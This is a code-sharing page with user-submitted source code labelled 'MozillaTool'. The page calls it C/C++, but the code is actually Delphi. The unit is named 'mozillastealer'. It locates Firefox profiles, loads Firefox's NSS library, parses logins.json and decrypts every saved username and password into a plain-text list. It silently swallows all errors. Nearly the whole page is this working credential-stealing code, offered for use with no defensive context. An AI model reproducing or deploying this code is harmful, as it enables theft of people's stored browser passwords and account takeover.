Ask Question

Name:
Title:
Your Question:

Answer Question

Name:
Your Answer:
User Submitted Source Code!


Description:
  MozillaTool
Language: C/C++
Code:
unit mozillastealer;

interface

uses
  windows;

function getMozilla(): string;


implementation

var
  version,
  FireFoxPath: string;

function GetFileList(const Path: String): string;
var a: Cardinal;
   fa: _WIN32_FIND_DATAA;
begin
result:='';
TRY
a:=FindFirstFile(PansiChar(path+PChar('\*.*')),fa);
while FindNextFile(a,fa) do
result:=result+fa.cFileName+#13#10;
EXCEPT
END;
end;

procedure GetFFInfos;
begin
  FireFoxPath:='';
TRY
  if pos('Mozilla Firefox', GetFileList('c:\Program Files (x86)\'))<>0 then FireFoxPath:='C:\Program Files (x86)\Mozilla Firefox\';
  if pos('Mozilla Firefox', GetFileList('c:\Program Files'))<>0 then FireFoxPath:='C:\Program Files\Mozilla Firefox\';
EXCEPT
END;
end;



Function Splitter(Texto, Delimitador: String; Indice: integer): string;
var
DelimiPos, i: integer;
begin
for i:= 1 to indice do
  begin
    DelimiPos:= pos(Delimitador,Texto);
    if DelimiPos <> 0 then
      Delete(Texto, 1, DelimiPos + length(Delimitador) -1);
  end;

DelimiPos:= pos(Delimitador,Texto);

if DelimiPos <> 0 then
  Texto:= Copy(Texto,1,delimipos -1);

SetLength(Result, Length(Texto));
Result:= Texto;
end;


function Pars(T_, ForS, _T: string): string;
var a, b:integer;
begin
Result := '';
if (T_='') or (ForS='') or (_T='') then Exit;
a:=Pos(T_, ForS);
if a=0 then Exit else a:=a+Length(T_);
ForS:=Copy(ForS, a, Length(ForS)-a+1);
b:=Pos(_T, ForS);
if b>0 then
Result:=Copy(ForS, 1, b - 1);
end;



Function GetFile(const FileName : AnsiString) : AnsiString;
Var
 F : File;
 FSize : Longint;
begin
  Result:='';
  if GetFileAttributes(Pchar(FileName)) = DWORD($FFFFFFFF) then exit;
  FileMode:=0;
  AssignFile ( F, FileName);
  Reset(F, 1);
  FSize:=FileSize(F);
  SetLength(Result,FSize);
  BlockRead(F, Result[1],FSize);
  CloseFile(F);
  FileMode:=2;
end;




function ParseMozJSON(j: string): string;
var
data, it, ress: string;
begin
data:=GetFile(j);
data:=Pars(',"logins":[{',data,'}],"disabledHosts":[],"version":1}');
while pos(',"hostname":"', data)<> 0 do
  begin
   it:= Pars(',"hostname":"', data, 'timesUsed":');
   ress:=ress + copy(it, 1, pos('","',it)-1);
   delete(it, 0, pos('encryptedUsername":"', it));
   ress:=ress + '<|>'+Pars('encryptedUsername":"',it,'","');
   delete(it, 0, pos('encryptedPassword":"', it));
   ress:=ress + '<|>'+Pars('encryptedPassword":"',it,'","')+#13#10;
   delete(data, 1, pos('timesUsed":',data));
end;
result:=ress;
end;


function getMozilla(): string;
type
  TSECItem = packed record
  SECItemType: dword;
  SECItemData: pchar;
  SECItemLen: dword;
end;
  PSECItem = ^TSECItem;
var
  NSSModule: THandle;
  hToken: THandle;
  NSS_Init: function(configdir: pchar): dword; cdecl;
  NSSBase64_DecodeBuffer: function(arenaOpt: pointer; outItemOpt: PSECItem; inStr: pchar; inLen: dword): dword; cdecl;
  PK11_GetInternalKeySlot: function: pointer; cdecl;
  PK11_Authenticate: function(slot: pointer; loadCerts: boolean; wincx: pointer): dword; cdecl;
  PK11SDR_Decrypt: function(data: PSECItem; result: PSECItem; cx: pointer): dword; cdecl;
  NSS_Shutdown: procedure; cdecl;
  PK11_FreeSlot: procedure(slot: pointer); cdecl;
  ProfilePath: array [0..MAX_PATH] of char;
  ProfilePathLen: dword;
  FirefoxProfilePath: pchar;
  MainProfile: array [0..MAX_PATH] of char;
  MainProfilePath: pchar;
  EncryptedSECItem: TSECItem;
  DecryptedSECItem: TSECItem;
  KeySlot: pointer;
  i:integer;
  username, password: string;
  V: Extended;
  buffer, huyufer: string;
  a: Cardinal;
  fa: _WIN32_FIND_DATAA;
begin
TRY

  try
GetFFInfos;
except
end;

try
if FireFoxPath = '' then exit;
except
end;

try
  LoadLibrary(pchar(FirefoxPath + 'mozglue.dll'));
except
end;

try
  NSSModule := LoadLibrary(pchar(FirefoxPath + 'nss3.dll'));
except
end;

try
  @NSS_Init := GetProcAddress(NSSModule, pchar('NSS_Init'));
except
end;

try
  @NSSBase64_DecodeBuffer := GetProcAddress(NSSModule, pchar('NSSBase64_DecodeBuffer'));
except
end;

try
  @PK11_GetInternalKeySlot := GetProcAddress(NSSModule, pchar('PK11_GetInternalKeySlot'));
except
end;

try
  @PK11_Authenticate := GetProcAddress(NSSModule, pchar('PK11_Authenticate'));
except
end;

try
  @PK11SDR_Decrypt := GetProcAddress(NSSModule, pchar('PK11SDR_Decrypt'));
except
end;

try
  @NSS_Shutdown := GetProcAddress(NSSModule, pchar('NSS_Shutdown'));
except
end;

try
  @PK11_FreeSlot := GetProcAddress(NSSModule, pchar('PK11_FreeSlot'));
except
end;

try
  OpenProcessToken(GetCurrentProcess, TOKEN_QUERY, hToken);
except
end;

try
  ProfilePathLen := MAX_PATH;
except
end;

try
  ZeroMemory(@ProfilePath, MAX_PATH);
except
end;

try
  GetEnvironmentVariable('APPDATA', ProfilePath, ProfilePathLen);
except
end;

try
  FirefoxProfilePath := pchar(profilePath +'\Mozilla\Firefox\profiles.ini');
except
end;

a:=FindFirstFile(PansiChar(profilePath + '\Mozilla\Firefox\Profiles\'+PChar('\*.*')),fa);
      while FindNextFile(a,fa) do
        if GetFileAttributes(PChar(profilePath + '\Mozilla\Firefox\Profiles\'+fa.cFileName+'\logins.json')) <> DWORD($FFFFFFFF) then
          try


MainProfile:='';
lstrcat(MainProfile,PChar('Profiles/'+fa.cFileName));

if NSS_Init(pchar(profilePath + '\Mozilla\Firefox\' + mainProfile)) = 0 then
    begin
      KeySlot := PK11_GetInternalKeySlot;
      if KeySlot <> nil then
      begin
        if PK11_Authenticate(KeySlot, True, nil) = 0 then
        begin
        huyufer:=ParseMozJSON(PChar(profilePath + '\Mozilla\Firefox\Profiles\'+fa.cFileName+'\logins.json'));

        while pos(#13#10, huyufer)<>0 do
        BEGIN
            buffer:=copy(huyufer, 0, pos(#13#10, huyufer));
            delete(huyufer, 1, pos(#13#10, huyufer)+1);
            ZeroMemory(@EncryptedSECItem, SizeOf(EncryptedSECItem));
            ZeroMemory(@DecryptedSECItem, SizeOf(DecryptedSECItem));

            result := result + 'URL:'+#$9+Splitter(buffer, '<|>', 0) + #13#10;
            username:= Splitter(buffer, '<|>', 1);
            Password := Splitter(buffer, '<|>', 2);


            NSSBase64_DecodeBuffer(nil, @EncryptedSECItem, pchar(Username), Length(Username));

            PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil);
            Result := result + 'LOG:'+#$9+Copy(DecryptedSECItem.SECItemData, 1, DecryptedSECItem.SECItemLen) + #13#10;


            ZeroMemory(@EncryptedSECItem, SizeOf(EncryptedSECItem));
            ZeroMemory(@DecryptedSECItem, SizeOf(DecryptedSECItem));


            NSSBase64_DecodeBuffer(nil, @EncryptedSECItem, pchar(Password), Length(Password));
            PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil);
            Result := result + 'PWD:'+#$9+Copy(DecryptedSECItem.SECItemData, 1, DecryptedSECItem.SECItemLen)  + #13#10+ #13#10;
          END;
        end else result:= result + '';
        PK11_FreeSlot(KeySlot);
      end else
      result:= result + '';
      NSS_Shutdown;
    end else
    result:= result + '';
except
end;
EXCEPT
END;
end;

end.
Comments: